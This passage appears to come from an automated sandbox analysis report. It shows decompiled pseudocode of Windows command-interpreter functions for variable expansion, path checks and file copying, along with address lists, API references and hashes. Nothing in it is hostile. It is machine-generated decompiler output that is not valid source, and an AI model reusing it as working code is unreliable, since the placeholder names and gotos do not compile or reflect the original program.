								L37:
								_t80 = _t79 - 2;
							}
						}
						goto L7;
					}
					__eflags = _t102;
					if(_t102 == 0) {
						goto L37;
					}
				}
				L7:
				_t75 = 0;
				 *_t80 = 0;
				_t81 = _t104;
				_v12 = 0;
				_t38 =  *_t104 & 0x0000ffff;
				if(_t38 == 0) {
					L13:
					 *0x2db8a4 = 0x2d3892;
					 *_t113 = 0;
					if(_t75 > 0x2001) {
						__eflags = 0;
						 *0x2d3892 = 0;
						goto L40;
					} else {
						return E002B0040(_t81);
					}
				} else {
					while(1) {
						_t83 = _t104;
						_t104 = _t104 + 2;
						_v16 = _t83;
						if(_t75 > 0x2001) {
							break;
						}
						if(_t38 == 0x25) {
							_t93 =  *0x2e3cc4;
							__eflags = _t93;
							if(__eflags == 0) {
								L19:
								_t81 = E002A8F70(0x2db8f8, _t104, __eflags,  &_v12, 0x25);
								__eflags = _t81;
								if(_t81 == 0) {
									__eflags =  *0x2e3cc4;
									_t113 =  *0x2db8a4;
									if( *0x2e3cc4 == 0) {
										goto L33;
									} else {
										_t104 = _v16 + (_v12 + 1) * 2;
									}
									goto L11;
								} else {
									goto L20;
								}
							} else {
								_t54 =  *_t104 & 0x0000ffff;
								__eflags = _t54 - 0x25;
								if(_t54 == 0x25) {
									_t29 = _t83 + 4; // 0x4
									_t104 = _t29;
									L33:
									 *_t113 = 0x25;
									_t113 = _t113 + 2;
									_t75 = _t75 + 1;
									goto L24;
								} else {
									__eflags = _t54 - 0x2a;
									if(_t54 == 0x2a) {
										__eflags =  *0x2e3cc9;
										if( *0x2e3cc9 == 0) {
											goto L18;
										} else {
											_t99 =  *(_t93 + 0x34);
											_t18 = _t83 + 4; // 0x4
											_t104 = _t18;
											__eflags = _t99;
											if(_t99 == 0) {
												goto L11;
											} else {
												_t89 = _t99;
												_v16 = _t89 + 2;
												do {
													_t59 =  *_t89;
													_t89 = _t89 + 2;
													__eflags = _t59;
												} while (_t59 != 0);
												_t91 = _t89 - _v16 >> 1;
												_v20 = _t91;
												__eflags = _t91;
												if(_t91 <= 0) {
													goto L11;
												} else {
													_t60 = _t91 + _t75;
													_v16 = _t60;
													__eflags = _t60 - 0x2000;
													if(_t60 > 0x2000) {
														memcpy(_t113, _t99, 0x2000 - _t75 + 0x2000 - _t75);
														 *0x2d7892 = 0;
														E002AC5A2(_t91, 0x234f, 1, 0x2d3892);
														goto L41;
													} else {
														E002B1040(_t113, 0x2003 - (_t113 - 0x2d3890 >> 1), _t99);
														_t75 = _v16;
														_t113 = _t113 + _v20 * 2;
														 *0x2db8a4 = _t113;
														goto L11;
													}
												}
											}
										}
									} else {
										L18:
										_t81 = E002B1969(0x2db8f8, _t104,  &_v12, L"0123456789", _t93 + 0x3c);
										__eflags = _t81;
										if(__eflags != 0) {
											L20:
											_t108 = _t81;
											_t10 = _t108 + 2; // 0x2
											_t95 = _t10;
											do {
												_t49 =  *_t108;
												_t108 = _t108 + 2;
												__eflags = _t49;
											} while (_t49 != 0);
											_t110 = _t108 - _t95 >> 1;
											_t75 = _t75 + _t110;
											__eflags = _t75 - 0x2001;
											if(_t75 > 0x2001) {
												L40:
												_push(0);
												_push(0x233f);
												E002AC5A2(_t81);
												L41:
												_t82 = _v8;
												E002B0040(_v8);
												__imp__longjmp(0x2db8f8, 0xffffffff);
												asm("int3");
												_push(0);
												_push(8);
												E002AC5A2(_t82);
												__eflags = 0;
												return 0;
											} else {
												_t116 =  *0x2db8a4;
												E002B1040(_t116, 0x2003 - (_t116 - 0x2d3890 >> 1), _t81);
												_t113 = _t116 + _t110 * 2;
												_t112 = _v12 + 1;
												__eflags = _t112;
												_t104 = _v16 + _t112 * 2;
												L24:
												 *0x2db8a4 = _t113;
												goto L11;
											}
										} else {
											goto L19;
										}
									}
								}
							}
						} else {
							 *_t113 = _t38;
							_t75 = _t75 + 1;
							_t113 = _t113 + 2;
							 *0x2db8a4 = _t113;
							if(_t38 == 0xa) {
								break;
							} else {
								L11:
								_t38 =  *_t104 & 0x0000ffff;
								if(_t38 != 0) {
									continue;
								} else {
									break;
								}
							}
						}
						goto L43;
					}
					_t81 = _v8;
					goto L13;
				}
				L43:
			}

































                                              0x002afe15
                                              0x002afe19
                                              0x002afe1b
                                              0x002afe20
                                              0x002afe25
                                              0x002afe28
                                              0x002afe2c
                                              0x002bc954
                                              0x002bc959
                                              0x002bc95c
                                              0x002bc96d
                                              0x00000000
                                              0x002afe32
                                              0x002afe32
                                              0x002afe38
                                              0x002afe3f
                                              0x002afe41
                                              0x002afe43
                                              0x002afe43
                                              0x002afe4b
                                              0x00000000
                                              0x00000000
                                              0x002afe4d
                                              0x002afe54
                                              0x00000000
                                              0x002afe56
                                              0x002afe56
                                              0x002afe59
                                              0x002afe5c
                                              0x002afe5f
                                              0x00000000
                                              0x002afe61
                                              0x002bc973
                                              0x002bc973
                                              0x002bc973
                                              0x002afe5f
                                              0x00000000
                                              0x002afe54
                                              0x002afe66
                                              0x002afe68
                                              0x00000000
                                              0x00000000
                                              0x002afe68
                                              0x002afe6e
                                              0x002afe70
                                              0x002afe72
                                              0x002afe75
                                              0x002afe77
                                              0x002afe7a
                                              0x002afe80
                                              0x002afeb6
                                              0x002afeb8
                                              0x002afec2
                                              0x002afecb
                                              0x002bc9ad
                                              0x002bc9af
                                              0x00000000
                                              0x002afed1
                                              0x002afedc
                                              0x002afedc
                                              0x002afe82
                                              0x002afe82
                                              0x002afe82
                                              0x002afe84
                                              0x002afe87
                                              0x002afe90
                                              0x00000000
                                              0x00000000
                                              0x002afe96
                                              0x002afedd
                                              0x002afee3
                                              0x002afee5
                                              0x002aff1b
                                              0x002aff2d
                                              0x002aff2f
                                              0x002aff31
                                              0x002b0022
                                              0x002b0029
                                              0x002b002f
                                              0x00000000
                                              0x002b0031
                                              0x002b0038
                                              0x002b0038
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002afee7
                                              0x002afee7
                                              0x002afeea
                                              0x002afeed
                                              0x002b000e
                                              0x002b000e
                                              0x002b0011
                                              0x002b0016
                                              0x002b0019
                                              0x002b001c
                                              0x00000000
                                              0x002afef3
                                              0x002afef3
                                              0x002afef6
                                              0x002aff93
                                              0x002aff9a
                                              0x00000000
                                              0x002affa0
                                              0x002affa0
                                              0x002affa3
                                              0x002affa3
                                              0x002affa6
                                              0x002affa8
                                              0x00000000
                                              0x002affae
                                              0x002affae
                                              0x002affb3
                                              0x002affb6
                                              0x002affb6
                                              0x002affb9
                                              0x002affbc
                                              0x002affbc
                                              0x002affc4
                                              0x002affc6
                                              0x002affc9
                                              0x002affcb
                                              0x00000000
                                              0x002affd1
                                              0x002affd1
                                              0x002affd4
                                              0x002affd7
                                              0x002affdc
                                              0x002bc987
                                              0x002bc991
                                              0x002bc9a3
                                              0x00000000
                                              0x002affe2
                                              0x002afff5
                                              0x002afffd
                                              0x002b0000
                                              0x002b0003
                                              0x00000000
                                              0x002b0003
                                              0x002affdc
                                              0x002affcb
                                              0x002affa8
                                              0x002afefc
                                              0x002afefc
                                              0x002aff15
                                              0x002aff17
                                              0x002aff19
                                              0x002aff37
                                              0x002aff37
                                              0x002aff39
                                              0x002aff39
                                              0x002aff40
                                              0x002aff40
                                              0x002aff43
                                              0x002aff46
                                              0x002aff46
                                              0x002aff4d
                                              0x002aff4f
                                              0x002aff51
                                              0x002aff57
                                              0x002bc9b5
                                              0x002bc9b5
                                              0x002bc9b7
                                              0x002bc9bc
                                              0x002bc9c4
                                              0x002bc9c4
                                              0x002bc9c7
                                              0x002bc9d3
                                              0x002bc9d9
                                              0x002bc9da
                                              0x002bc9dc
                                              0x002bc9de
                                              0x002bc9e6
                                              0x002bc9e9
                                              0x002aff5d
                                              0x002aff5d
                                              0x002aff76
                                              0x002aff7e
                                              0x002aff84
                                              0x002aff84
                                              0x002aff85
                                              0x002aff88
                                              0x002aff88
                                              0x00000000
                                              0x002aff88
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aff19
                                              0x002afef6
                                              0x002afeed
                                              0x002afe98
                                              0x002afe98
                                              0x002afe9b
                                              0x002afe9c
                                              0x002afe9f
                                              0x002afea9
                                              0x00000000
                                              0x002afeab
                                              0x002afeab
                                              0x002afeab
                                              0x002afeb1
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002afeb1
                                              0x002afea9
                                              0x00000000
                                              0x002afe96
                                              0x002afeb3
                                              0x00000000
                                              0x002afeb3
                                              0x00000000

                                              APIs
                                                • Part of subcall function 002B00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000), ref: 002B00C1
                                                • Part of subcall function 002B00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000,?), ref: 002B00C8
                                              • memset.MSVCRT ref: 002BC954
                                              • longjmp.MSVCRT(002DB8F8,000000FF,00000000,002D3892,002D3890,?,?,?,?,002AFD5C,?,?,?,002B837D,00000000), ref: 002BC96D
                                              • memcpy.MSVCRT ref: 002BC987
                                              • longjmp.MSVCRT(002DB8F8,000000FF,002D3892,002D3890,?,?,?,?,002AFD5C,?,?,?,002B837D,00000000), ref: 002BC9D3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heaplongjmp$AllocProcessmemcpymemset
                                              • String ID: 0123456789
                                              • API String ID: 2034586978-2793719750
                                              • Opcode ID: a30fddae558444b73981c35cfe8247d5e1885620a751318f104c3e67ec31cc3e
                                              • Instruction ID: ab74fe295bd4df9f480b2f323a82e2dcedf540336dd72998bda4c329e8da6c67
                                              • Opcode Fuzzy Hash: a30fddae558444b73981c35cfe8247d5e1885620a751318f104c3e67ec31cc3e
                                              • Instruction Fuzzy Hash: BA713935A203029BDB14DF68DE497BA73A5EF86740F28407AE805EB391EF349D62C750
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B6390, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 183COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E002B6390(void* __ecx, long __edx) {
				intOrPtr _v8;
				signed int _v16;
				long _v28;
				char _v32;
				void* _v36;
				void _v556;
				signed int _v560;
				signed short* _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t35;
				intOrPtr _t47;
				void* _t54;
				void* _t61;
				signed int _t64;
				signed int _t68;
				signed int _t69;
				signed int _t71;
				signed int _t78;
				signed int _t83;
				signed short* _t92;
				void* _t97;
				signed int _t100;
				intOrPtr _t102;
				void* _t103;
				signed int _t104;
				signed short* _t106;
				int _t108;
				void* _t109;
				signed int _t110;
				signed int _t115;

				_t95 = __edx;
				_t71 = _t115;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t71 + 4));
				_t113 = (_t115 & 0xfffffff8) + 4;
				_t35 =  *0x2cd0b4; // 0x40f69e4c
				_v16 = _t35 ^ (_t115 & 0xfffffff8) + 0x00000004;
				_t102 =  *((intOrPtr*)(_t71 + 8));
				_t108 = 0;
				_v28 = 0x104;
				_v36 = 0;
				_v32 = 1;
				memset( &_v556, 0, 0x104);
				if(E002B0C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t47 = 1;
					L32:
					_t108 = _t47;
					L10:
					__imp__??_V@YAXPAX@Z(_v36);
					_pop(_t103);
					_pop(_t109);
					return E002B6FD0(_t108, _t71, _v16 ^ _t113, _t95, _t103, _t109);
				}
				_t104 = E002AEA40( *((intOrPtr*)(_t102 + 0x3c)), 0x2a24ac, (0 |  *0x2e3cc9 != 0x00000000) + 2);
				_v560 = _t104;
				if( *0x2e3cc9 == 0) {
					L4:
					_t78 = _t104;
					_t17 = _t78 + 2; // 0x2
					_t97 = _t17;
					do {
						_t54 =  *_t78;
						_t78 = _t78 + 2;
					} while (_t54 != _t108);
					_v560 = _t78 - _t97 >> 1;
					E002B1040(_t104, _v560 + 1, E002B22C0(_t71, _t104));
					_t95 =  *_t104 & 0x0000ffff;
					if(_t95 != 0) {
						_t83 = _t104;
						_t26 = _t83 + 2; // 0x2
						_v560 = _t26;
						do {
							_t58 =  *_t83;
							_t83 = _t83 + 2;
						} while (_t58 != _t108);
						if(_t83 - _v560 >> 1 != 2 ||  *((short*)(_t104 + 2)) != 0x3a || iswalpha(_t95) == 0) {
							_t47 = E002C8371(_t58, _t104);
							 *0x2db8b0 = _t47;
							goto L32;
						} else {
							_t88 = _v36;
							if(_v36 == 0) {
								_t88 =  &_v556;
							}
							_t95 = _v28;
							E002B36CB(_t71, _t88, _v28,  *_t104 & 0x0000ffff);
							_t61 = _v36;
							if(_t61 == 0) {
								_t61 =  &_v556;
							}
							L9:
							_push(_t61);
							E002B25D9(L"%s\r\n");
							 *0x2db8b0 = _t108;
							goto L10;
						}
					}
					_t91 =  *0x2e3cb8;
					if( *0x2e3cb8 == 0) {
						_t91 = 0x2e3ab0;
					}
					_t95 =  *0x2e3cc0;
					E002B36CB(_t71, _t91,  *0x2e3cc0, _t108);
					_t61 =  *0x2e3cb8;
					if(_t61 == 0) {
						_t61 = 0x2e3ab0;
					}
					goto L9;
				}
				_t64 =  *_t104 & 0x0000ffff;
				_t92 = _t104;
				_t110 = _t104;
				if(_t64 != 0) {
					_t100 = _t64;
					do {
						 *_t110 = _t100;
						if(_t100 == 0) {
							L17:
							_v564 =  &(_t92[1]);
							while(1) {
								_t23 = _t110 - 2; // -4
								_t106 = _t23;
								if(iswspace( *_t106 & 0x0000ffff) == 0) {
									goto L20;
								}
								_t110 = _t106;
							}
							goto L20;
						} else {
							goto L16;
						}
						do {
							L16:
							_t92 =  &(_t92[1]);
							_t110 = _t110 + 2;
							_t69 =  *_t92 & 0x0000ffff;
							 *_t110 = _t69;
						} while (_t69 != 0);
						goto L17;
						L20:
						_t92 = _v564;
						 *_t110 = 0;
						_t110 = _t110 + 2;
						_t68 =  *_t92 & 0x0000ffff;
						_t100 = _t68;
					} while (_t68 != 0);
					_t104 = _v560;
				}
				 *_t110 = 0;
				_t108 = 0;
				goto L4;
			}




































                                              0x002b6390
                                              0x002b6393
                                              0x002b6395
                                              0x002b6396
                                              0x002b63a1
                                              0x002b63a5
                                              0x002b63ad
                                              0x002b63b4
                                              0x002b63b9
                                              0x002b63c2
                                              0x002b63c4
                                              0x002b63cd
                                              0x002b63d2
                                              0x002b63d6
                                              0x002b63ff
                                              0x002bf71c
                                              0x002bf7f0
                                              0x002bf7f0
                                              0x002b64bc
                                              0x002b64bf
                                              0x002b64cb
                                              0x002b64ce
                                              0x002b64da
                                              0x002b64da
                                              0x002b6428
                                              0x002b642a
                                              0x002b6430
                                              0x002b6449
                                              0x002b6449
                                              0x002b644b
                                              0x002b644b
                                              0x002b644e
                                              0x002b644e
                                              0x002b6451
                                              0x002b6454
                                              0x002b645d
                                              0x002b6474
                                              0x002b6479
                                              0x002b647f
                                              0x002bf77f
                                              0x002bf781
                                              0x002bf784
                                              0x002bf78a
                                              0x002bf78a
                                              0x002bf78d
                                              0x002bf790
                                              0x002bf7a0
                                              0x002bf7e6
                                              0x002bf7eb
                                              0x00000000
                                              0x002bf7b5
                                              0x002bf7b5
                                              0x002bf7ba
                                              0x002bf7bc
                                              0x002bf7bc
                                              0x002bf7c5
                                              0x002bf7c9
                                              0x002bf7ce
                                              0x002bf7d3
                                              0x002bf7d9
                                              0x002bf7d9
                                              0x002b64a9
                                              0x002b64a9
                                              0x002b64af
                                              0x002b64b6
                                              0x00000000
                                              0x002b64b6
                                              0x002bf7a0
                                              0x002b6485
                                              0x002b6492
                                              0x002b64dd
                                              0x002b64dd
                                              0x002b6494
                                              0x002b649b
                                              0x002b64a0
                                              0x002b64a7
                                              0x002b64e1
                                              0x002b64e1
                                              0x00000000
                                              0x002b64a7
                                              0x002b6432
                                              0x002b6435
                                              0x002b6437
                                              0x002b643c
                                              0x002bf722
                                              0x002bf724
                                              0x002bf724
                                              0x002bf72a
                                              0x002bf73d
                                              0x002bf740
                                              0x002bf74a
                                              0x002bf74a
                                              0x002bf74a
                                              0x002bf75a
                                              0x00000000
                                              0x00000000
                                              0x002bf748
                                              0x002bf748
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002bf72c
                                              0x002bf72c
                                              0x002bf72c
                                              0x002bf72f
                                              0x002bf732
                                              0x002bf735
                                              0x002bf738
                                              0x00000000
                                              0x002bf75c
                                              0x002bf75c
                                              0x002bf764
                                              0x002bf767
                                              0x002bf76a
                                              0x002bf76d
                                              0x002bf76f
                                              0x002bf774
                                              0x002bf774
                                              0x002b6444
                                              0x002b6447
                                              0x00000000

                                              APIs
                                              • memset.MSVCRT ref: 002B63D6
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEAB7
                                                • Part of subcall function 002AEA40: iswspace.MSVCRT ref: 002AEB2D
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEB49
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEB6D
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B64BF
                                              • iswspace.MSVCRT ref: 002BF751
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: wcschr$iswspacememset
                                              • String ID: %s
                                              • API String ID: 2220997661-3043279178
                                              • Opcode ID: 1694ccb5efbf8dd6a7e5cb7833ee87528d0c87f8a081799c3c40f13323517ba3
                                              • Instruction ID: 9505c535a8da8074f27726d178bfb27f14c3603d862e9b8ee8b3fd2e558c593f
                                              • Opcode Fuzzy Hash: 1694ccb5efbf8dd6a7e5cb7833ee87528d0c87f8a081799c3c40f13323517ba3
                                              • Instruction Fuzzy Hash: EB512675A201169BCB24DF68EC895FAB7B5EF44390F2801AEE845D7240EF349E61DB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C85E9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 174COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E002C85E9(intOrPtr __ecx, signed int __edx) {
				signed int _v20;
				int _v32;
				char _v36;
				int _v40;
				void _v560;
				int _v568;
				char _v572;
				int _v576;
				void _v1096;
				int _v1104;
				char _v1108;
				int _v1112;
				void* _v1124;
				void _v1632;
				intOrPtr _v1636;
				signed int _v1640;
				int _v1644;
				signed int* _v1648;
				signed int* _v1652;
				signed int _v1656;
				intOrPtr _v1660;
				char _v1664;
				void* _v1668;
				void* _v1672;
				void* _v1676;
				void* _v1680;
				void* _v1684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t196;
				signed int _t198;
				void* _t218;
				void* _t232;
				signed int _t236;
				void* _t237;
				signed int _t239;
				void* _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				signed char _t258;
				intOrPtr _t260;
				void* _t263;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t273;
				signed int _t274;
				signed int _t276;
				signed int _t279;
				void* _t280;
				signed int _t281;
				void* _t282;
				signed int _t290;
				signed int _t291;
				void* _t292;
				signed int _t293;
				signed int _t295;
				void* _t296;
				signed int _t297;
				void* _t298;
				signed int _t299;
				void* _t300;
				void* _t303;
				intOrPtr _t305;
				signed int _t307;
				void* _t316;
				void* _t317;
				signed int _t346;
				void* _t348;
				void* _t352;
				intOrPtr _t354;
				intOrPtr _t356;
				void* _t357;
				WCHAR* _t358;
				signed int _t359;
				signed int _t368;
				intOrPtr _t371;
				signed int _t392;
				signed int _t412;
				void* _t414;
				signed int _t416;
				signed int _t418;
				intOrPtr _t419;
				void* _t420;
				signed int* _t421;
				void* _t422;
				signed int _t426;
				signed int _t428;
				signed int _t431;
				void* _t435;

				_t391 = __edx;
				_t318 = __ecx;
				_t418 = __edx;
				if(__ecx != 0) {
					_push(0);
					_push(__ecx);
					E002AC108(__ecx);
					_pop(_t318);
				}
				if(_t418 == 1) {
					_t418 = 0x2e3d00;
					E002B274C(0x2e3d00, 0x104, L"%9d",  *0x2cd56c);
					E002AC108(_t318, 0x2336, 1, 0x2e3d00);
					_t426 = _t426 + 0x1c;
				}
				 *0x2cd560 =  *0x2e8064 & 0x000000ff;
				while(1) {
					_t196 =  *0x2cd5dc; // 0x0
					_t435 =  *0x2cd568 - _t196; // 0x0
					if(_t435 >= 0) {
						break;
					}
					_t318 =  *((intOrPtr*)( *0x2e3cf4 + _t196 * 4 - 4));
					E002ACD27(_t318);
				}
				__imp__longjmp(0x2db8f8, 1);
				asm("int3");
				_t428 = (_t426 & 0xfffffff8) - 0x67c;
				_t198 =  *0x2cd0b4; // 0x40f69e4c
				_v20 = _t198 ^ _t428;
				_push(_t418);
				_push(_t412);
				_v1640 = _t391;
				_t419 = _t318;
				_v1104 = 0x104;
				_v1644 = 0;
				_t316 = 1;
				_v1112 = 0;
				_t413 = _t412 | 0xffffffff;
				_v1108 = 1;
				memset( &_v1632, 0, 0x104);
				_v36 = 1;
				_v32 = 0x104;
				_v40 = 0;
				memset( &_v560, 0, 0x104);
				_v572 = 1;
				_v568 = 0x104;
				_v576 = 0;
				memset( &_v1096, 0, 0x104);
				_t431 = _t428 + 0x24;
				if(E002B0C70( &_v1632, ((0 | _v1108 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E002B0C70( &_v560, ((0 | _v36 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E002B0C70( &_v1096, ((0 | _v572 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L141:
					E002B0DE8(E002B0DE8(E002B0DE8(_t214,  &_v1096),  &_v560),  &_v1632);
					_t218 = _t316;
				} else {
					_t214 = E002A585F(0xfe00,  &_v1648, 0);
					_v1668 = _t214;
					if(_t214 == 0) {
						goto L141;
					} else {
						if( *0x2cd560 == 0) {
							_t232 = _v1648;
							goto L17;
						} else {
							_v1652 = _v1648;
							_t214 = E002A585F(_v1648,  &_v1668, 1);
							_v1652 = _t214;
							if(_t214 != 0) {
								if(_v1648 >= _v1668) {
									_t232 = _v1668;
									L17:
									_v1652 = _t232;
								}
								_t421 =  *(_t419 + 0x20);
								_v1648 = _t421;
								while(1) {
									_t214 = E002AAD44( *_t421);
									if(_t214 != 0) {
										break;
									}
									_t421 = _t421[8];
									_v1648 = _t421;
									if(_t421 != 0) {
										continue;
									} else {
										_t316 = _t214;
										goto L141;
									}
									goto L142;
								}
								_t391 =  *_t421;
								__eflags = 0;
								E002B68BA(E002B6A00,  *_t421, 0x21, 0, _t421[6],  &_v1664);
								while(1) {
									_t421[7] = _t421[7] & 0xffff3fff;
									_t236 = _t421[7];
									__eflags = _t236 & 0x00000004;
									if((_t236 & 0x00000004) != 0) {
										_t307 = _t236 & 0xfffffffb | 0x00000002;
										__eflags = _t307;
										_t421[7] = _t307;
									}
									__eflags =  *0x2cd544;
									if( *0x2cd544 != 0) {
										break;
									}
									_t391 = _v40;
									__eflags = _v40;
									if(_v40 == 0) {
										_t391 =  &_v560;
									}
									_t237 = E002A579C(_t421, _t391, _v32);
									__eflags = _t237 - _t316;
									if(_t237 == _t316) {
										break;
									} else {
										_push(_t421[1]);
										E002B25D9(L"%s\r\n");
										_t239 = _v1112;
										__eflags = _t239;
										if(_t239 == 0) {
											_t239 =  &_v1632;
										}
										_t391 = _v1640;
										_t240 = E002A5226(_t421, _v1640, _t239, _v1104, 0);
										__eflags = _t240 - _t316;
										if(_t240 == _t316) {
											break;
										} else {
											_t392 = _v1112;
											_t241 = _t392;
											__eflags = _t392;
											if(_t392 == 0) {
												_t241 =  &_v1632;
											}
											__eflags =  *_t241;
											if( *_t241 != 0) {
												__eflags = _t392;
												if(_t392 == 0) {
													_t392 =  &_v1632;
												}
												_t244 = E002C8F66(_t421[1], _t392);
												_t346 = _t421[1];
												__eflags = _t244;
												if(_t244 == 0) {
													_t422 = E002A5DB5(_t346, (_t421[7] & 0x00000800) << 0xa, _t346, _t346);
													__eflags = _t422 - 0xffffffff;
													if(_t422 == 0xffffffff) {
														E002ACD27(_v1664);
														L135:
														_t348 = 0x6e;
														E002C985A(_t348);
														L130:
														__eflags = 0;
														E002C85E9(0, _t316);
														L131:
														E002ACD27(_v1664);
														E002ADB92(_t422);
														_t352 = _v1668;
														L129:
														E002ADB92(_t352);
														goto L130;
													}
													_t252 = E002B0178(_t245);
													__eflags = _t252;
													if(_t252 == 0) {
														_t354 = _v1652;
													} else {
														_t354 = 0x80;
														_v1652 = 0x80;
													}
													_t253 = _v1112;
													__eflags = _t253;
													if(_t253 == 0) {
														_t253 =  &_v1632;
													}
													_t415 = _v1648;
													_t255 = E002A5712(_t422, _v1660, _t354,  &_v1656, _v1648, _t413, _t253);
													__eflags =  *0x2e3cf0;
													_v1656 = _t255;
													if( *0x2e3cf0 != 0) {
														_t356 = _v1664;
														L137:
														E002ACD27(_t356);
														_t357 = _t422;
														L134:
														E002ADB92(_t357);
														goto L135;
													}
													_t358 = _v1112;
													__eflags = _t358;
													if(_t358 == 0) {
														_t358 =  &_v1632;
													}
													_t258 = GetFileAttributesW(_t358);
													_t359 = _v1112;
													__eflags = _t258 & 0x00000002;
													if((_t258 & 0x00000002) != 0) {
														__eflags = _t359;
														if(_t359 == 0) {
															_t359 =  &_v1632;
														}
														_t360 = E002A5DB5(_t359, _t316, _t359, _t359);
														_v1680 = _t360;
														_v1676 = _t360;
													} else {
														__eflags = _t359;
														if(__eflags == 0) {
															_t359 =  &_v1632;
														}
														_t303 = E002A43A0(_t359, __eflags);
														_v1672 = _t303;
														_v1668 = _t303;
														__eflags = _t303 - 0xffffffff;
														if(_t303 == 0xffffffff) {
															L136:
															_t356 = _v1664;
															goto L137;
														}
														__imp___get_osfhandle(_t303);
														SetEndOfFile(_t303);
														_t360 = _v1672;
													}
													__eflags = _t360 - 0xffffffff;
													if(_t360 == 0xffffffff) {
														goto L136;
													}
													__eflags =  *0x2cd5cc;
													if( *0x2cd5cc == 0) {
														L69:
														_t260 = _v1636;
														while(1) {
															__eflags = _t260 - _t316;
															if(_t260 != _t316) {
																goto L84;
															}
															_t291 = _v1112;
															__eflags = _t291;
															if(_t291 == 0) {
																_t291 =  &_v1632;
															}
															_t292 = E002C916C(_t360, _v1660, _v1656, _t291, _t422);
															__eflags =  *0x2cd560;
															_t382 = _v1684;
															if( *0x2cd560 != 0) {
																_t295 = E002B0178(_t292);
																__eflags = _t295;
																if(_t295 != 0) {
																	_t382 = _v1672;
																} else {
																	_t408 = _v1112;
																	__eflags = _v1112;
																	if(__eflags == 0) {
																		_t408 =  &_v1632;
																	}
																	_t296 = E002C84FE(_t295, _t408, __eflags, _v1656, _v1660, _v1644);
																	__eflags = _t296 - _t316;
																	if(_t296 == _t316) {
																		goto L131;
																	}
																	_t382 = _v1668;
																	_v1672 = _v1668;
																}
															}
															_t293 = _v1112;
															__eflags = _t293;
															if(_t293 == 0) {
																_t293 =  &_v1632;
															}
															_t260 = E002A5712(_t422, _v1660, _v1652,  &_v1656, _t415, _t382, _t293);
															__eflags =  *0x2cd5cc;
															if( *0x2cd5cc == 0) {
																_t360 = _v1672;
																continue;
															}
															goto L84;
														}
													} else {
														__eflags = _v1656;
														if(_v1656 > 0) {
															_t297 = _v1112;
															__eflags = _t297;
															if(_t297 == 0) {
																_t297 =  &_v1632;
															}
															_t298 = E002C916C(_t360, _v1660, _v1656, _t297, _t422);
															__eflags =  *0x2cd560;
															_t360 = _v1684;
															if( *0x2cd560 != 0) {
																_t299 = E002B0178(_t298);
																__eflags = _t299;
																if(_t299 != 0) {
																	_t360 = _v1672;
																} else {
																	_t410 = _v1112;
																	__eflags = _v1112;
																	if(__eflags == 0) {
																		_t410 =  &_v1632;
																	}
																	_t300 = E002C84FE(_t299, _t410, __eflags, _v1656, _v1660, _v1644);
																	__eflags = _t300 - _t316;
																	if(_t300 == _t316) {
																		E002ACD27(_v1664);
																		E002ADB92(_t422);
																		_t352 = _v1668;
																		goto L129;
																	}
																	_t360 = _v1668;
																	_v1672 = _v1668;
																}
															}
														}
														__eflags =  *0x2cd5cc;
														if( *0x2cd5cc == 0) {
															goto L69;
														}
													}
													L84:
													__eflags = 0;
													 *0x2cd5cc = 0;
													E002ADB92(_t422);
													_t421 = _v1648;
												} else {
													_t305 = E002C8E52(_t421, _v1660, _v1652);
													_v1680 = _t305;
													_v1676 = _t305;
												}
												_t416 = _t421[8];
												_t263 = 0;
												 *0x2cd564 = 0;
												__eflags = _t416;
												if(_t416 != 0) {
													do {
														_t265 =  *(_t416 + 0x1c);
														__eflags = _t265 & 0x00000004;
														if((_t265 & 0x00000004) != 0) {
															_t290 = _t265 & 0xfffffffb | 0x00000002;
															__eflags = _t290;
